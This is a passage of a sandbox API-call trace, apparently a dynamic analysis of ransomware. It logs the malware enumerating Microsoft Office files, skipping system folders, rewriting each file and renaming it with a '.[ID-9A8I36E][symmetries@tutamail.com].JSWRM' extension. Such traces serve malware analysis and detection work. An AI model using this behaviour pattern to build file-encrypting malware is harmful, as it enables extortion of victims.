hHeap=0x1e0000) returned 1 [0113.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0113.202] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f030 [0113.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0113.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.202] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_postcommon.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_postcommon.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_postcommon.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_postcommon.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0113.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0113.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ba88 | out: hHeap=0x1e0000) returned 1 [0113.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.203] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x116bf2cb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x116bf2cb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x116bf2cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x461, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", cAlternateFileName="OFD6FB~1.MCX")) returned 1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2=".") returned 1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2="..") returned 1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2="...") returned 1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2="windows") returned -1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2="recovery") returned -1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2="perflogs") returned -1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2="documents and settings") returned 1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2="system volume information") returned -1 [0113.203] lstrcmpiW (lpString1="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpString2="msocache") returned 1 [0113.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0113.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0113.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0113.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", cchWideChar=51, lpMultiByteStr=0x20d698, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpUsedDefaultChar=0x0) returned 51 [0113.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0113.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0113.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", cchWideChar=51, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 51 [0113.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0113.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", cchWideChar=51, lpMultiByteStr=0x20dde8, cbMultiByte=51, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Office.x-none.msi.16_PostCommon.Office.x-none.mcxml", lpUsedDefaultChar=0x0) returned 51 [0113.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0113.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22df20 [0113.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0113.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.203] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22f6c0 [0113.203] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_PostCommon.Office.x-none.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_postcommon.office.x-none.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.204] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1121) returned 1 [0113.204] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x460) returned 0x230a00 [0113.204] ReadFile (in: hFile=0x238, lpBuffer=0x230a00, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x460, lpOverlapped=0x0) returned 1 [0113.211] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.211] WriteFile (in: hFile=0x238, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x460, lpOverlapped=0x0) returned 1 [0113.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0113.211] CloseHandle (hObject=0x238) returned 1 [0113.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0113.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0113.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0113.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0113.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0113.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0113.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.212] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_PostCommon.Office.x-none.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_postcommon.office.x-none.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Office.x-none.msi.16_PostCommon.Office.x-none.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office.x-none.msi.16_postcommon.office.x-none.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22e358 | out: hHeap=0x1e0000) returned 1 [0113.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22f6c0 | out: hHeap=0x1e0000) returned 1 [0113.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0113.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0113.213] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x116bf2cb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x116bf2cb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x116bf2cb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa25e, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="office32ww.msi.16_crossbitness.mcxml", cAlternateFileName="OF73AB~1.MCX")) returned 1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2=".") returned 1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2="..") returned 1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2="...") returned 1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2="windows") returned -1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2="recovery") returned -1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2="perflogs") returned -1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2="documents and settings") returned 1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2="system volume information") returned -1 [0113.213] lstrcmpiW (lpString1="office32ww.msi.16_crossbitness.mcxml", lpString2="msocache") returned 1 [0113.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0113.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32ww.msi.16_crossbitness.mcxml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0113.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32ww.msi.16_crossbitness.mcxml", cchWideChar=36, lpMultiByteStr=0x22cdc8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="office32ww.msi.16_crossbitness.mcxml", lpUsedDefaultChar=0x0) returned 36 [0113.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0113.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0113.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32ww.msi.16_crossbitness.mcxml", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0113.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32ww.msi.16_crossbitness.mcxml", cchWideChar=36, lpMultiByteStr=0x22d260, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="office32ww.msi.16_crossbitness.mcxml", lpUsedDefaultChar=0x0) returned 36 [0113.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0113.213] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0113.213] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22df20 | out: hHeap=0x1e0000) returned 1 [0113.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.213] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0113.214] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\office32ww.msi.16_crossbitness.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office32ww.msi.16_crossbitness.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.214] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=41566) returned 1 [0113.214] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa250) returned 0x24c1d0 [0113.214] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0xa250, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0xa250, lpOverlapped=0x0) returned 1 [0113.219] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.219] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0xa250, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0xa250, lpOverlapped=0x0) returned 1 [0113.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.220] CloseHandle (hObject=0x238) returned 1 [0113.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0113.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0113.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0113.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b448 [0113.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23fa98 [0113.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b448 | out: hHeap=0x1e0000) returned 1 [0113.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.220] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\office32ww.msi.16_crossbitness.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office32ww.msi.16_crossbitness.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\office32ww.msi.16_crossbitness.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office32ww.msi.16_crossbitness.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fa98 | out: hHeap=0x1e0000) returned 1 [0113.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0113.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0113.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.221] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x116bf2cb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x116bf2cb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x116e5533, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d3b0a, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="office32ww.msi.16_office32ww.mcxml", cAlternateFileName="OF4373~1.MCX")) returned 1 [0113.221] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2=".") returned 1 [0113.221] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2="..") returned 1 [0113.221] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2="...") returned 1 [0113.221] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2="windows") returned -1 [0113.221] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2="recovery") returned -1 [0113.221] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2="perflogs") returned -1 [0113.221] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2="documents and settings") returned 1 [0113.221] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.221] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2="system volume information") returned -1 [0113.222] lstrcmpiW (lpString1="office32ww.msi.16_office32ww.mcxml", lpString2="msocache") returned 1 [0113.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0113.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32ww.msi.16_office32ww.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0113.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32ww.msi.16_office32ww.mcxml", cchWideChar=34, lpMultiByteStr=0x22d260, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="office32ww.msi.16_office32ww.mcxml", lpUsedDefaultChar=0x0) returned 34 [0113.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0113.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0113.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32ww.msi.16_office32ww.mcxml", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0113.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="office32ww.msi.16_office32ww.mcxml", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="office32ww.msi.16_office32ww.mcxml", lpUsedDefaultChar=0x0) returned 34 [0113.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0113.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0113.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0113.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0113.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\office32ww.msi.16_office32ww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.222] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=4012810) returned 1 [0113.223] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.223] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.223] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.238] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.238] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.238] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.239] CloseHandle (hObject=0x238) returned 1 [0113.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0113.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.239] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.239] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | 